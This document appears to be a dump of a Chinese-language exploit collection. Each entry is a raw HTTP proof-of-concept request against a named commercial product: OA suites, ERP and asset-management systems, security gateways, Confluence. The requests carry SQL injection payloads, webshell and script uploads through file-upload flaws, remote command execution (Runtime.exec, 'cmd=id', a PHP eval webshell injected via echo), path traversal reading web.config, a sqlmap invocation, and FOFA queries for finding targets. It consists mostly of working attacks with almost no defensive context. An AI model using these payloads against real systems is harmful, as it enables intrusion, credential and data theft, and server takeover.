5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 | Accept-Encoding: gzip, deflate
7 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
8 | Content-Type: application/x-www-form-urlencoded
9 | Connection: close
10 |
11 | out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
4 | Host:
5 | Upgrade-Insecure-Requests: 1
6 | Priority: u=0, i
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
9 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
10 | Accept-Encoding: gzip, deflate
11 |
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/金和OA_jc6_Upload任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/ HTTP/1.1
3 | Host: 127.0.0.1
4 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 | Accept-Encoding: gzip, deflate
6 | Accept: */*
7 | Connection: close
8 | Content-Length: 197
9 | Content-Type: multipart/form-data; boundary=ee055230808ca4602e92d0b7c4ecc63d
10 |
11 | --ee055230808ca4602e92d0b7c4ecc63d
12 | Content-Disposition: form-data; name="img"; filename="1.jsp"
13 | Content-Type: image/jpeg
14 |
15 | <% out.println("tteesstt1"); %>
16 | --ee055230808ca4602e92d0b7c4ecc63d--
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /logistics/home_warning/php/stock.php?do=getList&lsid=%28SELECT+%28CASE+WHEN+%289764%3D9765%29+THEN+%27%27+ELSE+%28SELECT+7700+UNION+SELECT+3389%29+END%29%29 HTTP/1.1
4 | Host:
5 | Upgrade-Insecure-Requests: 1
6 | Priority: u=0, i
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
9 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
10 | Accept-Encoding: gzip, deflate
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/金和OA_MailTemplates.aspx_SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1
3 | Host: you_ip
4 | Pragma: no-cache
5 | Cache-Control: no-cache
6 | Upgrade-Insecure-Requests: 1
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 | Accept-Encoding: gzip, deflate
10 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
11 | Connection: close
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/建文工程管理系统desktop.ashx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /SysFrame4/Desktop.ashx HTTP/1.1
3 | Host:
4 | Content-Type: application/x-www-form-urlencoded
5 | Accept-Encoding: gzip
6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 |
8 | account=1%27+AND+8607+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%288607%3D8607%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29-- RvNO&method=isChangePwd&pwd=
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\qps4cckjuz.asp HTTP/1.1
3 | Host: your_ip
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
5 | Connection: close
6 | Content-Length: 191
7 | Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
8 | Accept-Encoding: gzip, deflate
9 |
10 | ------9fh1lo9qobtszaiahg6v
11 | Content-Disposition: form-data; name="file"; filename="qps4cckjuz.jpg"
12 | Content-Type: image/png
13 |
14 | <% response.write(111*111)
15 | %>
16 |
17 | ------9fh1lo9qobtszaiahg6v--
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/科荣AIO系统UtilServlet存在任意命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /UtilServlet HTTP/1.1
4 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
5 | Accept-Encoding: gzip, deflate
6 | Accept: */*
7 | Connection: close
8 | Host:
9 | Content-Length: 324
10 | Content-Type: application/x-www-form-urlencoded
11 |
12 | operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
13 |
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /webconf/Exec/index?cmd=id HTTP/1.1
3 | Host: 127.0.0.1
4 | Cookie: PHPSESSID=4b250694b3e8973d81aaa03eefc85509
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 | Accept-Encoding: gzip, deflate
9 | Upgrade-Insecure-Requests: 1
10 | Sec-Fetch-Dest: document
11 | Sec-Fetch-Mode: navigate
12 | Sec-Fetch-Site: none
13 | Sec-Fetch-User: ?1
14 | Te: trailers
15 | Connection: close
16 | ```
17 |
18 |
--------------------------------------------------------------------------------
/飞讯云MyImportData前台SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /MyDown/MyImportData?opeid=72000301' HTTP/1.1
3 | Host:
4 | Pragma: no-cache
5 | Cache-Control: no-cache
6 | Upgrade-Insecure-Requests: 1
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 | Accept-Encoding: gzip, deflate
10 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
11 | Cookie: JSESSIONID=48887e3b-7976-4804-bb6c-17005cad41b1; Language=zh-CN
12 | Connection: close
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/百易云资产管理运营系统任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /comfileup.php HTTP/1.1
4 | Host:
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 | Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 | Accept-Encoding: gzip, deflate
9 | Connection: close
10 | Content-Type: multipart/form-data; boundary=--------1110146050
11 |
12 | ----------1110146050
13 | Content-Disposition: form-data; name="file";filename="rce.php"
14 |
15 |
16 | ----------1110146050--
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/锐捷-EG易网关存在RCE漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | 获取用户密码
3 | POST /login.php HTTP/1.1
4 | Host: 10.10.10.10
5 | User-Agent: Go-http-client/1.1
6 | Content-Length: 49
7 | Content-Type: application/x-www-form-urlencoded
8 | X-Requested-With: XMLHttpRequest
9 | Accept-Encoding: gzip
10 |
11 | username=admin&password=admin?show+webmaster+user
12 |
13 | 命令执行
14 | POST /cli.php?a=shell HTTP/1.1
15 | Host: 10.10.10.10
16 | User-Agent: Go-http-client/1.1
17 | Content-Length: 24
18 | Content-Type: application/x-www-form-urlencoded
19 | Cookie: 利用登录后Cookie的RUIJIEID字段进行替换,;user=admin;
20 | X-Requested-With: XMLHttpRequest
21 | Accept-Encoding: gzip
22 |
23 | notdelay=true&command=ls
24 | ```
25 |
26 |
--------------------------------------------------------------------------------
/小学智慧校园信息管理系统 Upload 文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /PSE/Upload HTTP/1.1
3 | Host: x.x.x.x
4 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
5 | Content-Type: multipart/form-data; boundary=230982304982309
6 | Connection: close
7 | Content-Length: 239
8 |
9 | --230982304982309
10 | Content-Disposition: form-data; name="file"; filename="Hello.aspx"
11 | Content-Type: image/jpg
12 |
13 | <%@Page Language="C#"%><%Response.Write("HelloWorldTest");System.IO.File.Delete(Request.PhysicalPath);%>
14 | --230982304982309--
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 | Connection: close
6 | Content-Type: multipart/form-data; boundary=---------------WebKitFormBoundaryMmx988TUuintqO4Q
7 | Accept-Encoding: gzip
8 | Content-Length: 243
9 |
10 | -----------------WebKitFormBoundaryMmx988TUuintqO4Q
11 | Content-Disposition: form-data; name="123.txt"; filename="123.txt"
12 | Content-Type: application/octet-stream
13 | Content-Length: 255
14 |
15 | 1111
16 | -----------------WebKitFormBoundaryMmx988TUuintqO4Q--
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/方天云智慧平台系统文件上传.md:
--------------------------------------------------------------------------------
1 | fofa
2 |
3 | body="AjaxMethods.asmx/GetCompanyItem"
4 |
5 |
6 |
7 |
8 |
9 | ```
10 | POST /Upload.ashx HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
13 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
14 | Connection: close
15 |
16 | ------WebKitFormBoundarySl8siBbmVicABvTX
17 | Content-Disposition: form-data; name="file"; filename="qwe.aspx"
18 | Content-Type: image/jpeg
19 |
20 | <%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
21 | ------WebKitFormBoundarySl8siBbmVicABvTX--
22 | ```
23 |
24 | UploadFile/CustomerFile/返回的路径名
--------------------------------------------------------------------------------
/润乾报表InputServlet存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /InputServlet?action=12 HTTP/1.1
4 | Host: 120.55.41.98:6868
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 | Content-Type: multipart/form-data; boundary=00contentOboundary00
8 | Connection: close
9 | Content-Length: 238
10 |
11 | --00contentOboundary00
12 | Content-Disposition: form-data; name="upsize"
13 |
14 | 1024
15 | --00contentOboundary00
16 | Content-Disposition: form-data; name="file"; filename="/\..\\..\\..\12.jsp"
17 | Content-Type: image/jpeg
18 |
19 | test
20 | --00contentOboundary00--
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1
3 | Host:
4 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 | Cookie: __RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJGXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1; ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl
6 | Priority: u=0, i
7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
9 | Accept-Encoding: gzip, deflate
10 | Upgrade-Insecure-Requests: 1
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/指尖云平台-智慧政务payslip SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1
3 | Host: xx.xx.xx.xx
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | Cookie: GOASESSID=i589f58naalabocmbidup7edl3
10 | Upgrade-Insecure-Requests: 1
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/数字通指尖云平台-智慧政务payslip SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1
3 | Host: xx.xx.xx.xx
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | Cookie: GOASESSID=i589f58naalabocmbidup7edl3
10 | Upgrade-Insecure-Requests: 1
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/资管云--任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /comfileup.php HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
5 | Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe
10 | Upgrade-Insecure-Requests: 1
11 | Priority: u=1
12 | Content-Type: multipart/form-data; boundary=--------1110146050
13 | Content-Length: 117
14 |
15 | ----------1110146050
16 | Content-Disposition: form-data; name="file";filename="test.php"
17 |
18 | test
19 | ----------1110146050--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/Panalog 日志审计系统 SQL 注入漏洞.md:
--------------------------------------------------------------------------------
1 | FOFA:body="Maintain/cloud_index.php"
2 |
3 | ```
4 |
5 | GET /Maintain/sprog_upstatus.php?status=1&rdb=1&id=1%20and%20updatexml(1,concat(0x7e,version(),0x7e),1) HTTP/1.1
6 | Host: 127.0.0.1
7 | Connection: keep-alive
8 | sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
9 | Accept: */*
10 | X-Requested-With: XMLHttpRequest
11 | sec-ch-ua-mobile: ?0
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
13 | sec-ch-ua-platform: "Windows"
14 | Sec-Fetch-Site: same-origin
15 | Sec-Fetch-Mode: cors
16 | Sec-Fetch-Dest: empty
17 | Accept-Encoding: gzip, deflate, br, zstd
18 | Accept-Language: zh-CN,zh;q=0.9
19 |
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/云课网校系统uploadImage存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /api/uploader/uploadImage HTTP/1.1
4 | Host: xx.xx.xx.xx
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6 | Accept-Encoding: gzip,deflate,br
7 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
8 | Cache-Control: no-cache
9 | Connection: keep-alive
10 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DInOLIXxe9m
11 | x-requested-with: XMLHttpRequest
12 |
13 | ------WebKitFormBoundaryLZbmKeasWgo2gPtU
14 | Content-Disposition: form-data; name="file"; filename="1.php"
15 | Content-Type: image/gif
16 |
17 |
18 | ------WebKitFormBoundaryLZbmKeasWgo2gPtU--
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/安恒明御安全网关rce.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"
3 | <%3fphpteval(\$_POST[\"a\"]) ;?>"+>+.xxx.php HTTP/1.1
4 | Host: xxx
5 | Cookie: USGSESSID=495b895ddd42b82cd89a29f241825081
6 | Pragma: no-cache
7 | Cache-Control: no-cache
8 | Upgrade-Insecure-Requests: 1
9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
10 | Sec-Fetch-User: ?1
11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
12 | Sec-Fetch-Site: none
13 | Sec-Fetch-Mode: navigate
14 | Accept-Encoding: gzip, deflate
15 | Accept-Language: zh-CN,zh;q=0.9
16 | Connection: close
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /comfileup.php HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
5 | Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe
10 | Upgrade-Insecure-Requests: 1
11 | Priority: u=1
12 | Content-Type: multipart/form-data; boundary=--------1110146050
13 | Content-Length: 117
14 |
15 | ----------1110146050
16 | Content-Disposition: form-data; name="file";filename="test.php"
17 |
18 | test
19 | ----------1110146050--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/金慧综合管理信息系统SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```\
2 | POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
3 | Host:
4 | Accept-Encoding: gzip, deflate
5 | Accept: */*
6 | X-Requested-With: XMLHttpRequest
7 | Content-Type: application/x-www-form-urlencoded
8 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
10 |
11 | Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/用友U9-UMWebService.asmx存在文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /u9/OnLine/UMWebService.asmx HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36
5 | Connection: close
6 | Content-Length: 381
7 | Content-Type: text/xml; charset=utf-8
8 | SOAPAction: "http://tempuri.org/GetLogContent"
9 | Accept-Encoding: gzip
10 |
11 |
12 |
13 |
14 |
15 | ../web.config
16 |
17 |
18 |
19 |
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/金和OA_upload_json.asp存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
3 | Host: your_ip
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
5 | Content-Length: 338
6 | Accept: */*
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | Content-Type: multipart/form-data; boundary=---------------------------153857212076213662067051609723
10 |
11 | -----------------------------153857212076213662067051609723
12 | Content-Disposition: form-data; name="localUrl"
13 |
14 |
15 | -----------------------------153857212076213662067051609723
16 | Content-Disposition: form-data; name="imgFile"; filename="hhh.txt"
17 | Content-Type: image/png
18 |
19 | hhh
20 | -----------------------------153857212076213662067051609723--
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/创客13星零售商城系统RCE.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /member/my_up_level?phone=%27%29%29%20UNION%20ALL%20SELECT%20CONCAT%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- HTTP/1.1
4 | Cache-Control: no-cache
5 | Cookie: PHPSESSID=6qc94pq3rvpu490r1doentg66a
6 | User-Agent: sqlmap/1.8.2.1#dev (https://sqlmap.org)
7 | Host: 127.0.0.1
8 | Accept: */*
9 | Accept-Encoding: gzip, deflate
10 | Connection: close
11 | ```
12 |
13 | ```
14 | python sqlmap.py -u "http://127.0.0.1/member/my_up_level?phone=*" --level=3 --dbms=mysql --cookie "PHPSESSID=6qc94pq3rvpu490r1doentg66a"
15 | ```
16 |
17 |
--------------------------------------------------------------------------------
/泛微OA E-Office V10 OfficeServer 任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | /eoffice10/server/public/iWebOffice2015/OfficeServer.php
3 | User - Agent':'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'
4 | Content - Length':'393'
5 | Content - Type': 'multipart / form - data;
6 | boundary = ----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
7 | Accept - Encoding': 'gzip, deflate'
8 | Connection':'close
9 |
10 | ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
11 | Content-Disposition': 'form-data; name="FileData"; filename="1.jpg"
12 | Content-Type': 'image/jpeg
13 |
14 |
15 | ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs",
16 | Content-Disposition': 'form-data; name="FormData"
17 | {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}"
18 | ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1
3 | Host: localhost
4 | sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
5 | sec-ch-ua-mobile: ?0
6 | sec-ch-ua-platform: "Linux"
7 | Upgrade-Insecure-Requests: 1
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10 | Sec-Fetch-Site: none
11 | Sec-Fetch-Mode: navigate
12 | Sec-Fetch-User: ?1
13 | Sec-Fetch-Dest: document
14 | Accept-Encoding: gzip, deflate, br
15 | Accept-Language: en-US,en;q=0.9
16 | Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
17 | Connection: close
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/SpringBlade系统menu接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1
3 | Host:
4 | User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
5 | Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
6 | Connection: close
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/Confluence远程命令执行漏洞(CVE-2024-21683).md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /admin/plugins/newcode/addlanguage.action HTTP/2
3 | Host: ip
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
5 | Accept-Encoding: gzip, deflate
6 | Accept: */*
7 | Connection: keep-alive
